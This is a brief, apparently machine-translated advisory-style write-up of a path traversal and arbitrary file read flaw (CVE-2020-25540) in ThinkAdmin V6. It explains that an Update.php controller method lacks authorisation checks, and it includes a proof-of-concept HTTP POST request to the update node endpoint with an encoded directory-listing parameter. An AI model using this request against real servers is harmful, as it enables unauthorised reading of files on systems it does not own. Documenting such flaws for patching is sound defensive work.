Thinkadmin V6 arbitrary file read vulnerability (cve-2020-25540)

0x00: Vulnerability profile :

ThinkAdmin It's a set of bases ThinkPHP Framework of the general background management system ,ThinkAdmin Rights management of is based on Standards RBAC Simplify , It eliminates the complicated node management , Make permission management simpler , Specifically, it includes node management 、 Rights management 、 Menu management 、 User management .

ThinkAdmin 6 There is a path traversal vulnerability in version . An attacker can exploit this vulnerability through GET Request encoding parameters to arbitrarily read files on the remote server .

0x01 Causes of loopholes :

https://github.com/zoujingli/ThinkAdmin/blob/v6/app/admin/controller/api/Update.php

Update.php Function method in is not authorized , Direct functions can be called directly . It leads to loopholes .

0x02 scope :

Thinkadmin Version less than ≤ 2020.08.03.01

0x03 Loophole recurrence :

POC：
POST /admin.html?s=admin/api.Update/node HTTP/1.1
Host: 127.0.0.1
Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

rules=%5B%22.%2F%22%5D

0x04 Repair suggestions :

Upgrade to the latest version